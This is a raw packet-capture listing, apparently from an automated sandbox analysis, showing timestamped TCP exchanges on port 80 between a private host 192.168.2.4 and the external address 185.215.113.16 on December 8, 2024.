Dec 8, 2024 19:52:39.561916113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.561990976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562006950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562020063 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562030077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562032938 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562050104 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562066078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562135935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562170029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562252998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562264919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562275887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562287092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562293053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562293053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562304974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562304974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562319040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562329054 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562329054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562355995 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562371969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562599897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562612057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562623024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562635899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562659025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562740088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562752008 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562766075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562777996 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562807083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562880039 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562891006 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562901020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562911987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562918901 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562922955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562933922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562944889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562947035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562956095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562966108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562972069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.562977076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.562988997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.563005924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.718401909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.718417883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.718513012 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.718658924 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.718709946 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.718766928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.718815088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.719595909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.719646931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.719672918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.719718933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.720563889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.720613003 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.720614910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.720649958 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.721456051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.721504927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.721565008 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.721611023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.722412109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.722456932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.722493887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.722553015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.723337889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.723387003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.723413944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.723454952 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.724152088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.724195004 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.724265099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.724313021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.725095987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.725161076 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.725171089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.725208044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.726031065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.726078987 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.726171017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.726214886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.726986885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.727032900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.727119923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.727165937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.727893114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.727936029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.728054047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.728097916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.728810072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.728856087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.728961945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.729038954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.729821920 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.729866028 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.729922056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.729964972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.730640888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.730745077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.730763912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.730809927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.731602907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.731654882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.731693983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.731739044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.732477903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.732533932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.732644081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.732692003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.733413935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.733464003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.733710051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.733755112 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.734322071 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.734369040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.734441996 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.734487057 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.735263109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.735304117 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.735310078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.735347986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.736183882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.736231089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.736232996 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.736269951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.737077951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.737114906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.737137079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.737185955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.738018036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.738109112 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.738111019 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.738174915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.738984108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.739008904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.739029884 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.739053965 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.739931107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.739943027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.739979029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.741131067 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.741178036 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.741301060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.741343975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.742547035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.742587090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.742634058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.742674112 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.743995905 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.744035006 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.744044065 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.744077921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.745270967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.745316029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.745454073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.745503902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.746671915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.746727943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.746781111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.746826887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.747324944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.747354031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.747368097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.747390032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.748136044 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.748157024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.748178005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.748198986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.748805046 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.748853922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.748867989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.748903990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.749645948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.749700069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.749720097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.749767065 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.750467062 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.750508070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.750516891 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.750543118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.751264095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.751291990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.751339912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.751348972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.752075911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.752131939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.752187014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.752235889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.752629995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.752684116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.752753019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.752799988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.753768921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.753815889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.753871918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.753916025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.754427910 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.754475117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.754487038 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.754523993 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.755507946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.755558968 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.755584955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.755623102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.758955002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.759015083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.759015083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.759027004 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.759048939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.759052038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.759078026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.759078026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.760040998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.760088921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.760123014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.760165930 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.760793924 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.760840893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.760902882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.760945082 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.761653900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.761698008 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.761698008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.761740923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.762579918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.762650013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.762677908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.762716055 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.763477087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.763523102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.763536930 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.763621092 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.764460087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.764513016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.764688015 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.764729977 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.765319109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.765371084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.765482903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.765527964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.766297102 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.766343117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.766354084 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.766390085 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.767241001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.767252922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.767286062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.767302990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.768111944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.768153906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.768203974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.768239975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.768961906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.769007921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.910430908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.910537004 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.910552025 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.910600901 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.910841942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.910893917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.910929918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.910978079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.911473036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.911524057 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.911562920 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.911608934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.912339926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.912389040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.912446022 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.912494898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.913256884 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.913309097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.913379908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.913430929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.914180994 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.914230108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.914288998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.914350986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.915035009 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.915083885 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.915116072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.915159941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.915925980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.915977955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.916002989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.916050911 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.916829109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.916884899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.916912079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.916950941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.917669058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.917717934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.917737007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.917779922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.918531895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.918580055 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.918665886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.918713093 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.919416904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.919466972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.919493914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.919537067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.920310974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.920360088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.920418024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.920464039 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.921247005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.921295881 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.921363115 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.921408892 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.922211885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.922244072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.922259092 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.922281027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.923079967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.923122883 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.923199892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.923244953 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.923947096 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.924010992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.924056053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.924099922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.924736023 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.924782991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.924854994 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.924904108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.925730944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.925779104 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.925849915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.925896883 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.926549911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.926600933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.926634073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.926677942 CET	49757	80	192.168.2.4	185.215.113.16
